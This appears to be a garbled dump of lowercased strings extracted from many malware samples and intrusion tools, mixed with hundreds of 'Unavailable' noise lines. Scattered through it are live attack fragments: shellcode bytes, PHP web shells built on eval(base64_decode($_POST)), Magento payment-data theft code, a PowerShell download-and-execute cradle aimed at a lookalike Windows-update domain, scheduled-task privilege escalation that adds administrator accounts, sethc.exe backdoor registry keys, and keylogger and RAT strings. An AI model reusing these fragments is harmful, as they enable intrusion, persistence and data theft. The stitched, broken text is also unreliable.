Unavailable load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
Unavailable tt> (
Unavailable uji+
Unavailable ypqc
Unavailable h|sc
Unavailable #tw~?
Unavailable sd*.
Unavailable 00dc7
Unavailable "jj%
Unavailable zpbb{
Unavailable fi4]m
Unavailable hhfd
Unavailable -installkys-removekys-startup/c delselect files!bind success!\\111.dat(*.jpg)|*.jpg|(*.*)|*.*||(*.exe)|*.exe|(*.*)|*.*||chksrv.exesedebugprivilegentqueryinformationprocessd
Unavailable aconlist`
Unavailable q@qjw
Unavailable expr-v.1.4..
Unavailable 88=+
Unavailable faum~
Unavailable ('8pw
Unavailable */"y
Unavailable 20.(
Unavailable 9t$x
Unavailable czlv0ulkpm
Unavailable vtrbju
Unavailable icaz8
Unavailable _.j[k
Unavailable szdq
Unavailable frhp
Unavailable hjk!=
Unavailable atan2
Unavailable r,b(
Unavailable hn8(
Unavailable hr[en
Unavailable l$8t
Unavailable }e!>
Unavailable \00dct
Unavailable e!*5{4[^
Unavailable fl[m="l
Unavailable t$a;
Unavailable jmyfilemappingobject[
Unavailable couninitialize
Unavailable e0a_a^]
Unavailable ptz8
Unavailable ,[rm
Unavailable [1my1w
Unavailable ^e|m
Unavailable .apple
Unavailable hnx"
Unavailable l$0h;
Unavailable p2oe
Unavailable <uez
Unavailable txt2com
Unavailable _tan
Unavailable rbx2
Unavailable \$ uvwavawh
Unavailable a_a^a]a\_^]
Unavailable |uf>6f%;
Unavailable zn4$=
Unavailable t$`l
Unavailable cta4t
Unavailable x {q
Unavailable vwu
Unavailable heapsize
Unavailable k|p<
Unavailable ,q$}
Unavailable l$,3
Unavailable +|0b8
Unavailable getclusterresourcetypekeyqueryinformationjobobjecti
Unavailable |$ph
Unavailable eo(c
Unavailable v1tiutfso
Unavailable a<dc{
Unavailable ogqx
Unavailable 9yws
Unavailable vtzg
Unavailable h !d
Unavailable noobyprotect se 1.1.5.0mz
Unavailable ig.:
Unavailable \\micns\\nsfreedll
Unavailable fb94ou
Unavailable %zswl
Unavailable +f6h
Unavailable kh)r
Unavailable kagh
Unavailable @ux+
Unavailable bh*!
Unavailable flpl
Unavailable enigma protector v1[
Unavailable - orien executable files prou
Unavailable ad`
Unavailable k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
Unavailable qsom8m
Unavailable --mprmmgva--
Unavailable pt-l
Unavailable %sdt
Unavailable [u7ja
Unavailable .d\t
Unavailable c 5*s
Unavailable 8]i+
Unavailable are you there!@#$%^&*()_+.hotp1
Unavailable @: %
Unavailable h>ij
Unavailable 9qz}/s
Unavailable hxtc
Unavailable :i{u
Unavailable bmquo
Unavailable x-mode: pushx-mode: popprogramm was started at %02i:%02i:%02is
Unavailable cd46a1a84ba06cea35d5e0219062162f227fdb26%s(error=%d)capapi32openservice failcreateservice failhttp://wpa.qq.com/msgrd?v=1&uin=312016&site=www.cnasm.com&menu=yesexplorer.exehttp://www.cnasm.com/gui/help.htmlhttp://www.cnasm.com/gui/error.htmlc
Unavailable jqf*
Unavailable fxsub.dll
Unavailable v\e@d
Unavailable #}@ix
Unavailable g(>`j
Unavailable iix@
Unavailable l$da
Unavailable &wbm
Unavailable ,y^$
Unavailable |:;~
Unavailable ]%1#
Unavailable v`zr
Unavailable 01.01
Unavailable |kjp
Unavailable )n)z)
Unavailable -p$#;
Unavailable for stud
Unavailable a36l.
Unavailable oaddldrlk
Unavailable //df
Unavailable }?$b
Unavailable |le}
Unavailable 220 lightftp server v1.0 ready*
Unavailable mj["#"
Unavailable 5p3h
Unavailable 7r}w
Unavailable coinitialize
Unavailable +fi]wj
Unavailable l^qj
Unavailable n5w' 3d
Unavailable +wvi
Unavailable zvf;-r
Unavailable h*>{
Unavailable n[ vmprotect v 0.8 (c) polytech ]
Unavailable s,j4
Unavailable pg*j
Unavailable g<m+
Unavailable -u)mg
Unavailable sendthisfile.
Unavailable wlh(miansha)<y}uzg|u=server(\xe5\xa3\xb3)|.h&$%':%%:&!hgqfbqf<
Unavailable m9.tqa
Unavailable `d&+
Unavailable r,&+
Unavailable ah{a@
Unavailable for /f \"eol=p tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txtif not \"%choice%\"==\"\" set choice=%choice:~0,1%bf **************forming time: %d/1
Unavailable nn<m
Unavailable +_]z
Unavailable eu}+kn*'^
Unavailable mthd
Unavailable \1w(
Unavailable |$0h
Unavailable '_pet
Unavailable c [1>h'
Unavailable va5~
Unavailable stack corrupted near unknown variable
Unavailable `l:(
Unavailable \$0h
Unavailable @)\
Unavailable `non-type-template-parameter
Unavailable >t )-
Unavailable lqgn1(
Unavailable msrstd.pdbm
Unavailable -pdpd
Unavailable 3c/w
Unavailable o<,'
Unavailable ouq$
Unavailable k g1
Unavailable qf2re
Unavailable )t$@3
Unavailable 0:-9
Unavailable mbrd
Unavailable \x00cmd.exe\x00\x00sethc.exe\x00\x00debugger\x00\x00software\\microsoft\\windows nt\\currentversion\\image file execution options\x00set xpost = createobject(s1):xpost.open \"get\",iremote,0:xpost.send()set sget = createobject(s2):sget.mode=3:sget.type=1:sget.open()wsh.echo \"rcmd v1.01 by netpatch\"wsh.echo \"read.vbs created!!!\"wsh.echo \"cscript \"&wscript.scriptfullname&\" targetip username password commandauthentication id:authentication package:authentication domain:primary user:* user: * domain: * password: -slave-listenwating on port %d...\x0aend waiting2\x0a
Unavailable ^jur]n[j]
Unavailable f9|$`t
Unavailable /*3!
Unavailable !o}lo`
Unavailable "c]"
Unavailable 0y54
Unavailable 8&v8
Unavailable qf*@
Unavailable "exestealth - wqx
Unavailable /;heh%a
Unavailable @si
Unavailable ssadt;
Unavailable :s=
Unavailable psvrvq
Unavailable y?.u
Unavailable s,]*
Unavailable :cxwl
Unavailable kln9
Unavailable izsd
Unavailable lg(>^t
Unavailable ug:w
Unavailable vx7[c
Unavailable h'k|p
Unavailable ?r%!
Unavailable %.2x
Unavailable )w;)bpt
Unavailable head74
Unavailable <cnj
Unavailable z4+3
Unavailable i<6d
Unavailable 7^3i
Unavailable l#''
Unavailable \$+2
Unavailable $a>f
Unavailable vmqw
Unavailable )u(8
Unavailable getmodulefilenamew
Unavailable </trustinfo>
Unavailable ?zea
Unavailable e00dc
Unavailable gr@ox
Unavailable d$,*
Unavailable extension: .dlli
Unavailable t7sh
Unavailable rscc/1.02
Unavailable a_a^a]a\_
Unavailable }\,yf
Unavailable jx({
Unavailable 4930040afec885c975f6itsecteam.comq29kzwqgynkgqw1pbibtag9rb2hpichqzwp2ywspdo=filemanageraaaieaqkaqwtxenjw7irzcx5jtyavgpa4zv6pvd3xwrzjhdcpqh2c47tkdwmtf8qh24uhsu3q0blcmatzxuibpcwtos9pvt2yq5lzqjp9uuqiajhcws4qhah/utq1ugbhaadimdv+pjamipct3fsty1uwxxbwjy1gnfr6zeq+iyrgrrmc
Unavailable s/"/a
Unavailable `wb7
Unavailable |$ avh
Unavailable 00dc%
Unavailable ef-z(
Unavailable 1<p}
Unavailable wvpsqr
Unavailable o.dap
Unavailable t$dqrv
Unavailable 5ha@
Unavailable ;{pu
Unavailable d$0h
Unavailable }"x(f
Unavailable *udj
Unavailable 'qas
Unavailable %s, progid:claveshell_traywndmelt.bat\\stubpath\\logs.dat1027|operation has been canceled!466|you need to plug-in! double click to install... |33|[keylogger not activated!]tvptaqeaaaaeaaaa//8aalgaaaatvoaaaaaaaaaaaaaaaaaaaaaaaatvqaaaeaaaaeabaaaaaaaaaaaaatvpqaaiaaaaeaa8a//8aalgaaaac
Unavailable noobyprotect se 1.2.1.0
Unavailable .9ax
Unavailable n$00dc
Unavailable getsystemdirectorya
Unavailable $zwh
Unavailable (c)sen
Unavailable 0bz=
Unavailable :z(:
Unavailable fw>s
Unavailable f2p(1a
Unavailable kmwx
Unavailable &t-"
Unavailable k#t+
Unavailable x;[n
Unavailable '/a%r
Unavailable software\locky
Unavailable aaaav
Unavailable `local vftable constructor closure'
Unavailable k(l{
Unavailable s)huaw
Unavailable !43r
Unavailable sej[q
Unavailable mrc<o
Unavailable pdp
Unavailable crc3un
Unavailable uhxq
Unavailable \+ck
Unavailable uaag
Unavailable t(=`
Unavailable l9:t?
Unavailable <?u7h
Unavailable [#g<
Unavailable h)6?
Unavailable plasmaratantieverythingh
Unavailable __fastcall
Unavailable qsvwj
Unavailable _ wi!
Unavailable v3.51
Unavailable c;.o
Unavailable ;&wl
Unavailable v\hy
Unavailable :n;t;y; <requestedexecutionlevel level2
Unavailable d$0h;g
Unavailable x avh
Unavailable .zylms
Unavailable fj(i"(
Unavailable %cko
Unavailable nwnuyg1
Unavailable q'#(
Unavailable b,y\"j/
Unavailable `, [
Unavailable z*lzq
Unavailable + y([?1b
Unavailable t0a;
Unavailable d$,vp
Unavailable "76op
Unavailable rh_^[y]
Unavailable >4 |pl
Unavailable d85k
Unavailable ld<g
Unavailable bcwn[=
Unavailable /~hp~
Unavailable "dmh.
Unavailable dgg)
Unavailable \$@@8=
Unavailable h@p+d
Unavailable 0fre
Unavailable s"3^
Unavailable d$ l
Unavailable 427r
Unavailable hxvc
Unavailable d$0h+
Unavailable cn00dc
Unavailable heartbeat fail reconnect.. ok!
Unavailable unt.
Unavailable (d$ @
Unavailable ntkrnlpa.exeiogetdeviceobjectpointerm
Unavailable /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
Unavailable c8r9
Unavailable exzh
Unavailable mbfd6%
Unavailable sssx-
Unavailable user32.dllj
Unavailable d$ a
Unavailable ^f3l
Unavailable zr|f
Unavailable pmbh
Unavailable tea;
Unavailable *<l`
Unavailable l2jr
Unavailable p%m*
Unavailable unknown filename
Unavailable ]v&?
Unavailable getdateformatw
Unavailable pg_d
Unavailable ?q8b
Unavailable d qm
Unavailable l9go
Unavailable ?mzu
Unavailable %b6g
Unavailable paddingxxpaddingpaddingxxpaddingpaddingxxpaddingpaddingxxpaddingpaddingxxpaddingu
Unavailable cm!m>
Unavailable @a7$
Unavailable ev=i
Unavailable dv25
Unavailable .fnwx{
Unavailable !p h
Unavailable tzi;
Unavailable 0{;nc
Unavailable oshelllink.hotkey = \"ctrl+shift+f\"set wshshell = wscript.createobject(\"wscript.shell\")oshelllink.iconlocation = \"notepad.exe, 0\"set oshelllink = wshshell.createshortcut(strstup & \"\\windefender.lnk\")wlg.datw
Unavailable sux{
Unavailable g:9;fg
Unavailable .p<,c
Unavailable xt1p
Unavailable >?hq
Unavailable hfff
Unavailable {5k5rq
Unavailable h7,h
Unavailable i(va
Unavailable gfffffffh
Unavailable aco@q
Unavailable l?pv1
Unavailable (|$03
Unavailable 5p[{
Unavailable ,apl
Unavailable 1n/!
Unavailable 08290el\
Unavailable .?aviptexternchannel@@@udata_channels@?1??getxagentinfo@agentkernel@@d:\\shared data\\data\\final data\\spec_ver\\azzy_dll_sslmail_2008\\release\\azzy_dll_sslmail_2008.pdb%
Unavailable `-<9
Unavailable \oot
Unavailable _cor
Unavailable sw$m
Unavailable ]x/3
Unavailable 2.1]u
Unavailable %@kicpt
Unavailable v$go
Unavailable *~7u(
Unavailable sn\s
Unavailable 7*jq
Unavailable bxk,d
Unavailable e20(
Unavailable zwca
Unavailable $y4q
Unavailable bvh{f
Unavailable p9}m
Unavailable !this program cannot be run in dos mode.a
Unavailable qix{
Unavailable s 6l|j{h
Unavailable u1l=d
Unavailable @o'<
Unavailable =87u
Unavailable [m=#<
Unavailable 98bp
Unavailable !d66
Unavailable f;\$8
Unavailable ^1<u
Unavailable h&cmc1
Unavailable tj[h
Unavailable wi9fz
Unavailable "r`a
Unavailable h8f@
Unavailable 0sssss4412021002050wwwwwvoicemailadobe.exee
Unavailable :4w:
Unavailable \\amd64\\elrawdsk.pdbr
Unavailable p[<{z
Unavailable zh"3
Unavailable a^h
Unavailable usqrvw
Unavailable 5qw_uls"mj
Unavailable virtualprotect
Unavailable %(@@
Unavailable d+`acrxe
Unavailable __msgid=__serial=o
Unavailable $q>mn
Unavailable -u?%
Unavailable ^cu3
Unavailable mj\k
Unavailable content-type: audio/wav
Unavailable hpzc
Unavailable 8zu h
Unavailable [$upd
Unavailable rah9
Unavailable get-content $env:public\\libraries\\update.vbs) -replacewss.run \"powershell.exe \" & chr(34) & \"& {waitfor haha /t 2}\" & chr(34), 0call extract(updatevbs, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\update.vbs\")createobject(\"wscript.shell\").run cmd, 0ojgdsb2jhbdptewhvc3qgpse9nrt0ijxb1ymxpyyvctglicmfyawvzxu2v0ihdzcya9ienyzwf0zu9iamvjdcgid1njcmlwdc5tagvjhnjcmlwdgrpcia9ifnwbgl0lvbhdggglvbhcmvudcatugf0acadqptzxqgd3nzid0gq3jlyxrlt2jqzwnd2hvyw1picygag9zdg5hbdownloadexecute=\"powershell \"\"&{$r=get-random;$wc=(new-object system.net.webclient);$wc.downloadfile(-executionpolicy bypass -file \"&home&\"dns.ps1\"createobject(\"wscript.shell\").run replace(downloadexecute,\"-_\",\"bat\")createobject(\"wscript.shell\").run dnscmd,0http://winodwsupdates.me%userprofile%\\appdata\\local\\microsoft\\ $fdn=[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('&{$rn = get-random; $id = 'tr') -replace '__',('dns'+$id) | \\upd.vbsschtasks /create /f /sc minute /mo ') -replace '__',('htp'+$id) | &{$rn = get-random -minimum 1 -maximum 10000; $id = 'azhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\libraries\\fireueye.vbs\
Unavailable )*a1
Unavailable tdf9
Unavailable wchar_t
Unavailable 8svxvhdr
Unavailable <0+z=
Unavailable noobyprotect se 1.2.9.0d
Unavailable qa}x
Unavailable * 0t?
Unavailable hd9;u
Unavailable [{d2
Unavailable >jwu
Unavailable h,fd
Unavailable edfr2
Unavailable bngw
Unavailable .n j*45ya
Unavailable 3|da
Unavailable #in!
Unavailable >7qf
Unavailable e.l<
Unavailable <k~c
Unavailable biel
Unavailable lbal
Unavailable 5,?x
Unavailable t4sh
Unavailable x(h;
Unavailable >rw
Unavailable bignum_datadsa_methodpdsadsa_mod_expbn_mod_expdsa_do_verifydsa_sign_setupdsa_do_signdsa_paramgenbn_mont_ctxu
Unavailable {mauthor usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
Unavailable port - port to listen on, defaults to 2323usage: srvcmd.exe [/h] [port]/h - hide windowaccepted connection from client at %serror %d: %sh
Unavailable h`/j
Unavailable j_,{
Unavailable ]w00dc
Unavailable ah4u
Unavailable 0q 2
Unavailable c er!.
Unavailable 8/u1@
Unavailable d=);
Unavailable ydyy
Unavailable localenametolcid
Unavailable ^i01wb
Unavailable 7ejo
Unavailable vwatavaw
Unavailable t$xl
Unavailable =wt.
Unavailable noobyprotect se 1.1.4.0
Unavailable t$`e
Unavailable rhbltf7
Unavailable c,dk
Unavailable v*<]
Unavailable xrpe@b"4
Unavailable i4@&
Unavailable ` awl
Unavailable get %dhttp/1.1post http://%ws:%d/%d%s%dhttp/1.1peeknamepipenormal.dotr_eor_eor_eo)cios_eod
Unavailable 6or<
Unavailable lzkm
Unavailable ,ou'`
Unavailable j!dc
Unavailable tvt democonfig-destory\\\\.\\pipe\\run_at_session (%d)
Unavailable p@yyqp
Unavailable revelationhelper.dllobjshell.run \"schtasks /change /tn wdw00t /disable\",,trueobjshell.run \"schtasks /run /tn wdw00t\",,true'objshell.run \"cmd /c copy c:\\windows\\system32\\tasks\\wdw00t .\",,truea.writeline (\"schtasks /delete /f /tn wdw00t\")a.writeline (\"net user /add ikat ikat\")a.writeline (\"cmd.exe\")strfilename=\"c:\\windows\\system32\\tasks\\wdw00t\"for n = 1 to (len (hexxml) - 1) step 2output.writeline \" should work on vista/win7/2008 x86/x64\"set objexecobject = objshell.exec(\"cmd /c schtasks /query /xml /tn wdw00t\")objshell.run \"schtasks /create /tn wdw00t /sc monthly /tr \"\"\"+biatchfile+\"a.writeline (\"net localgroup administrators /add v4l\")set ts = fso.createtextfile (\"wdw00t.xml\")extended module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80ikat exe templatewithadancyflavour..fasttracker v2.00 r
Unavailable d%j\wm
Unavailable n1xvg
Unavailable rvf;\$
Unavailable wm?_
Unavailable january
Unavailable m.g]s{
Unavailable a@g0
Unavailable avf;
Unavailable d$tl
Unavailable id?ls
Unavailable [setup_info]
Unavailable mh/v~h
Unavailable `eh vector destructor iterator'
Unavailable avfa
Unavailable g|bq`
Unavailable %$@@
Unavailable r%-<
Unavailable l 3x
Unavailable s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
Unavailable l$pfd
Unavailable exeshl.dll
Unavailable ez}o(
Unavailable +;kit.exeself.bat\\asm_driversiis_tunnel_installertunnellisten.dlltunnelconnect.dlldcomiisservicerasacd.syskeymmdrvisnclasdata_iisdata_iis/1/4/errordata_iis/1/4/nullsenddatatoconnectgetdatafromconnectdata_iisok[
Unavailable createtoolhelp32snapshot fail = %d
Unavailable /shareware - exestealth
Unavailable ^ga#_a
Unavailable ?/3
Unavailable w"$>
Unavailable g]20
Unavailable j fb
Unavailable $hf%
Unavailable d$@h;g
Unavailable lgn+!
Unavailable y8m+
Unavailable ryou8
Unavailable d$03
Unavailable corexitprocess
Unavailable sc<`
Unavailable gyyh
Unavailable >sdy_
Unavailable r_f;\$,
Unavailable gvxgj
Unavailable *edit_server*
Unavailable u2<_
Unavailable d$pi;
Unavailable getuserobjectinformationw
Unavailable &hg43>
Unavailable nuz2{
Unavailable wg|j
Unavailable q2:u
Unavailable d8(t
Unavailable d[!c
Unavailable svwatauawh
Unavailable kq%i
Unavailable b#r:
Unavailable m2>h&
Unavailable 00dc!
Unavailable ;<'{
Unavailable ]o01wb
Unavailable \$md$tc
Unavailable +z<e
Unavailable e,l=n
Unavailable xtalker7insta11 microsoftwudmessageecd4fc4d-521c-11d0-b792-00a0c90312e1b12ae898-d056-4378-a844-6d393fe37956loadstringinitializekeyhookfindresourcesloadstringfromhkcuhccutils.dllh:\fast\plug(hkcmd)\dll\release\hijackdll.pdb4673secreateglobalprivilegewindows\\system32\\sysprep\\sysprep.exenetwork access management agents }
Unavailable :qz"
Unavailable 5156windows\\system32\\sethc.exeappdata\\local\\temp\\microsoft word.exepng&w=800&h=600&ei=cnjcucsbl4rfkqx444hycw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58valid_global_groups: checking group membership of '%s\\%s'.usage: %s [-d domain][-g][-p][-c][-d][-h]-d default user domaine
Unavailable 5_c=b,
Unavailable arjy
Unavailable ~dic
Unavailable q4nue+
Unavailable on6s
Unavailable fxsst.dll.csvgetlastactivepopupgetprocessheaps:\\lidstone\\renewing\\ha\\disable\\in.pdbr
Unavailable a|w/u
Unavailable d$`h
Unavailable tc8( qsr
Unavailable yuy2
Unavailable ddedata initialized (unic
Unavailable _\bq
Unavailable o%}}|
Unavailable t$83
Unavailable {ef7652a4-98ef-5031-226b-11456c96a7ea}
Unavailable 5xbl
Unavailable ------
Unavailable "exestealth - www.webtoolmaster.com
Unavailable i?wr
Unavailable a#3c9q
Unavailable 9uhv
Unavailable kw=g
Unavailable \$@m
Unavailable hmyko3
Unavailable getprocad
Unavailable yjfa
Unavailable xu5kio
Unavailable +)iu
Unavailable t[h+
Unavailable uihc
Unavailable '._m
Unavailable 3m<g*
Unavailable mcs.exemcaltlib.dllw
Unavailable svwj
Unavailable }1#d
Unavailable getcurrentpackageid
Unavailable nbwl
Unavailable %01wb
Unavailable /m225n4k
Unavailable \:,>
Unavailable shlwapi.dllsetfilepointers
Unavailable getting portname/identifier failed - %xserialadddevice - error creating new devobj [%#08lx]external naming failed - status %x------- same multiport - different interrupts%x occurred prior to the wait - starting the'user registry info - userportindex: %dcould not report legacy device - %xentering serialgetportinfo'user registry info - userport: %xioopendeviceregistrykey failed - %x kernel debugger is using port at address %xrelease - freeing multi contextserial driver will not load port'user registry info - useraddressspace: %dserialadddevice: enumeration request, returning no_more_entries'user registry info - userindexed: %d\
Unavailable d$$pv
Unavailable rah]v
Unavailable ify
Unavailable 8jt/a
Unavailable iqsf\hy
Unavailable 4,8
Unavailable l1ofd
Unavailable *&~^%@0hh8979&*^*@~^%9?i0hhostname: %s\x0d\x0aip: %s\x0d\x0aproxy: %s\x0d\x0auser: %s\x0d\x0asystemdir: %s\x0d\x0aos language version: %d\x0d\x0asystem version: %d.%d %s (build %d)\x0d\x0a\x0d\x0ahostnrme: %s\x0d\x0aip: %s\x0d\x0aproxy: %s\x0d\x0auser: %s\x0d\x0asystemdir: %s\x0d\x0aos latguage version: %d\x0d\x0asystem version: %d.%d %s (build %d)\x0d\x0a\x0d\x0a84ll7r"zz*+%+48l8rll7+-{"z
Unavailable |*yx
Unavailable n[3+
Unavailable mf[~
Unavailable cryptdll.dllmd5initmd5updatemd5final
Unavailable </requestedprivileges>
Unavailable hhtc
Unavailable uprh
Unavailable tg5mc
Unavailable pa'^
Unavailable !'k <}h
Unavailable 7gjc)
Unavailable z08n9
Unavailable k[np
Unavailable s2}y
Unavailable d$h3
Unavailable |$43
Unavailable @]&@
Unavailable /w;f
Unavailable fu5slhj
Unavailable bi* v
Unavailable hlec
Unavailable ua}hg
Unavailable mnmx
Unavailable 1d\,
Unavailable deh1
Unavailable ug6%
Unavailable {0112-cras8468-
Unavailable 95000000990000009d000000c3000000c7000000cb000000d7000000e5000000install_exe.exe
Unavailable #['o
Unavailable tsworkspaces.dll%
Unavailable r=nrbgd.
Unavailable tvmj
Unavailable del weak1.txtdel attack.txtdel /s /q c:\\windows\\system32\\doors\\!&start iexplore http://www.crsky.com/soft/4818.html)uuumuuufuuufuuufuuufuuufuuufuuufuuufuuufuuufuuumuuu_credsusing wce r
Unavailable ),]e+
Unavailable %pdf-
Unavailable stack pointer corruption
Unavailable ie]>xn8
Unavailable "%-4
Unavailable {rz"n
Unavailable (g%17
Unavailable (d$0h
Unavailable escapedll.dllacrord32.execre'atetoo'lhelp
Unavailable x2.00
Unavailable fjhxu
Unavailable ]r8p
Unavailable )l$y
Unavailable mozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0; %s.%s)\" target=\"newref\"></a>c
Unavailable dqf9
Unavailable e 53
Unavailable \]{ q
Unavailable khjy
Unavailable u2e:
Unavailable fuf]af
Unavailable /+)r
Unavailable <description>winrar sfx module</description>b
Unavailable d$ p
Unavailable |0eu
Unavailable s,, <zw
Unavailable ! /fa
Unavailable cfcc
Unavailable ~iyj
Unavailable 77a779<c<g<m<r<x<9 9-9n9x9s9postquitmessagepwlfnn10,gzg_winver7cfc52cd3f87.dlls
Unavailable t'ud
Unavailable homepage: www.encryptpe.com
Unavailable aapu
Unavailable hprc
Unavailable copyright (c) 1991 w collis
Unavailable zcx{
Unavailable 7jb&y
Unavailable j_e{-
Unavailable !~~@u2
Unavailable yv12
